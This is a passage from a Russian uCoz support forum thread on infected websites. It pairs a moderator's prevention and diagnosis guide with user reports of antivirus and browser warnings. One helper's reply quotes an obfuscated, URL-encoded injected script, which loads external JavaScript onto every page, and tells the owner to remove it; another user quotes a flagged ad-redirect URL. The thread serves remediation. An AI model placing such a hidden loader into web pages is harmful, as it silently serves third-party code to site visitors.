Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    Anglerdima
    Сообщений: 133
    Репутация: 13

    Сообщение # 1801 | 22:01:27
    Сообщение отредактировал Anglerdima - Понедельник, 25 Май 2015, 22:02:03
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1802 | 22:14:20
    Anglerdima, не стоит отключать проксирование. и на будущее. не связывайтесь с бесплатными доменами

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    KETO
    Сообщений: 36
    Репутация: 0

    Сообщение # 1803 | 22:14:30
    c утра не могу попасть в админ панель своего сайта staffbull.info расположен на s7

    вот скрин того, что выдается на экран
    Прикрепления: 4241569.jpg (181.1 Kb)
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1804 | 08:39:53
    KETO, попробуйте воспользоваться другим браузером.
    4yGON
    Сообщений: 2
    Репутация: 0

    Сообщение # 1805 | 18:51:33
    webanet, malegame.ru
    вирус?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1806 | 20:25:33
    4yGON, нет. не вирус. скорее всего реакция на редирект по ссылке скачать
    зайдите в вебмастер яндекса - безопасность - посмотрите список урлов и вердикт. если вердикт поведенческий - это именно то о чем я. писать в тех.поддержку яндекса

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    wot8994
    Сообщений: 3
    Репутация: 0

    Сообщение # 1807 | 17:10:15
    Яндекс определил эту страницу как опасную. Дело в том что я не создавал эту страницу и понятия не имею как от неё избавиться.
    Помогите пожалуйста.
    http://wot-mods.ucoz.ru/news/2013-04-13
    Прикрепления: 4423883.png (51.0 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1808 | 17:41:19
    wot8994, вам со всех страниц сайта надо удалить скрипт
    Код
    <script type="text/javascript">
    <!--
    document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%0A%64% 6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61 %73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%76%61%74%61%72%69%61%2D%76%6B%6F%6E%74%61%6B%74%65%2E%72%75%2F%6A%73%2F%73%6 9%74%65%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%29%3B%0A%2F%2F%2D%2D%3E%0A%3C%2F%73%63%72%69%70%74%3E'));
    //-->
    </script>

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    victor8704
    Сообщений: 9
    Репутация: 1

    Сообщение # 1809 | 00:53:07
    При открытии сайта выскакивает на новой странице реклама MEGOGO.NET. Понимаю что это вирус, как избавиться??? Спасибо за помощь!!!

    Прежде чем мечтать, подумай - а вдруг сбудется !?
    Irina_M
    Сообщений: 603
    Репутация: 67

    Сообщение # 1810 | 10:34:46
    victor8704, уточните, пожалуйста, адрес проблемного сайта.
    prommaterials
    Сообщений: 288
    Репутация: 199

    Сообщение # 1811 | 11:07:36
    Добрый день!Два сайта:
    http://morskoyris.narod.ru
    и
    http://sivokoz-kuzma.narod.ru/
    В субботу и воскресенье не заходил на сайты. Сегодня, в понедельник, браузер Опера сообщает, что мои сайты - мошеннические. С сайтами в последнее время никаких работ не производилось.
    Снова криворукие разработчики юкозовские что-то напортачили? sad Вы их не пускайте на работу по пятницам.
    Браузер полностью блокирует сайты и открывает лишь после нажатия кнопки "игнорировать предупреждение".

    Уважаемая поддержка, подскажите, пожалуйста, в чём может быть проблема и что делать теперь?


    Дополнение: СЕМЬ часов прошло от времени этого сообщения. Кто-то тут жив из поддержки Юкоза? Спасибо за оперативность, *censored* поддержка.. (((
    Прикрепления: 4365108.jpg (65.3 Kb)

    Свобода слова допустима на страницах сайтов, посвящённых свободе слова. ©Miss_Esq

    употребление -тся и -ться в глаголах
    Сообщение отредактировал prommaterials - Понедельник, 08 Июн 2015, 18:35:39
    didicgami
    Сообщений: 11
    Репутация: 1

    Сообщение # 1812 | 08:43:47
    Подскажите пожалуйста, в поддержке гугл написали, что на моём сайте находится вредоносный код, редирект на другой сайт. И сказали, что эта ссылка опасна, она и делает редирект:
    
    Код
    http://srv1.make-conversions1.com/srv/display/index_light.php?id=1895&pub_id=2007&pecr=1&p7=1678b==AO4AjMwQjN3ETO0czM2czNzMDN2fe66&p8=b8386==AOwYjM5b184&p4=&p5=7093f==QM2ITMd29ef&cmp_id=2608&cpm=0.5&psrv=srv20,%20http://srv1.make-conversions1.com/srv/display/reset.css,%20http://srv1.make-conversions1.com/tags/?tid=138&hash=6xxrjl&width=320&height=50&campaign_id=1261&media_id=BIDDER_ID&placement_id=2&p5=1261,
    Но найти её на страницах своего сайта я так и не смог. Помогите определить вредоносный код.
    Мой сайт:
    http://os.moy.su/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1813 | 10:40:10
    prommaterials,
    Цитата
    Снова криворукие разработчики юкозовские что-то напортачили? sad Вы их не пускайте на работу по пятницам.
    можно чуть культурнее и тише, особенно не разобравшись в проблеме
    фильтра безопасности от яндекса и гугла на ваших сайтах нет. это самое главное. а угадывать какая версия оперы у вас по вашему скриншоту и какую базу она использует нет желания

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1814 | 10:40:34
    didicgami, рекламу юкоз отключите

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    didicgami
    Сообщений: 11
    Репутация: 1

    Сообщение # 1815 | 13:24:48
    webanet, то есть мой сайт признали вредоносным из-за стандартной Ucozовской рекламы? Это нормально?
    Поиск: